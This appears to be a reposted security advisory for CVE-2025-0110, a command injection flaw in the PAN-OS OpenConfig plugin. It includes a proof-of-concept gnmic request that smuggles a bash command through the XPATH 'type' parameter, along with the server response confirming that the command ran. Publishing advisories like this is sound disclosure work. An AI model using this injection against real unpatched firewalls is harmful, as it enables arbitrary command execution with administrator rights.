Palo Alto PAN-OS OpenConfig组件存在高危漏洞,允许认证用户执行任意bash命令(设备管理员权限)。通过OpenConfig API发送恶意参数触发。影响版本<2.1.2,已修复。 2025-2-19 00:0:59 Author: github.com(查看原文) 阅读量:5 收藏
Package
OpenConfig (PaloAlto OS)
Affected versions
< 2.1.2
Patched versions
>= 2.1.2
Summary
A vulnerability in PAN-OS OpenConfig allows an authenticated user to run arbitrary commands on the underlying OS. The commands are run as device administrator.
Details
Palo Alto Network Firewalls enable retrieval of syslogs through gnmi.Subscribe. With the OpenConfig plugin installed, the following OpenConfig API can be used with the parameterized XPATH:
pan-logging:/pan/logging/query/custom[type=system][direction=fwd][max_logs=2][period=last-24-hrs]
We found that the type parameter in the XPATH above can be used to send arbitrary bash commands to be executed on the firewall.
Severity
High - This vulnerability allows for an attacker to run arbitrary bash commands via gnmi.Subscribe.
Proof of Concept
In order to exploit this vulnerability, we created a request with type parameter set to a bash command that writes the string "system" to a file and reads it back.
XPATH
/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system > file1; cat file1)]
Request
We utilized gnmic tool to test this exploit.
./gnmic -a <IP>:<PORT> -u <username> --password=<password> --skip-verify \
-e json_ietf subscribe --mode once --log \
--path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]'
Response
{
"source": "<IP>:<PORT>",
"subscription-name": "<>",
"timestamp": <>,
"time": "<>",
"updates": [
{
"Path": "/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system \u003e file1; cat file1)]",
"values": {
"/pan/logging/query/custom": {
"code": "200",
"message": {
...
system is a valid value for parameter type. Response above shows that the server did successfully execute the bash commands echo system > file1; cat file1, producing the output system which was then provided as an input to type parameter.
Preconditions
OpenConfig Plugin is required to run the above exploit.
Further Analysis
Details of this CVE can be found at: https://security.paloaltonetworks.com/CVE-2025-0110
Timeline
Date reported: 10/17/2024
Date fixed: 01/14/2025
Date disclosed: 02/19/2025
如有侵权请联系:admin#unsafe.sh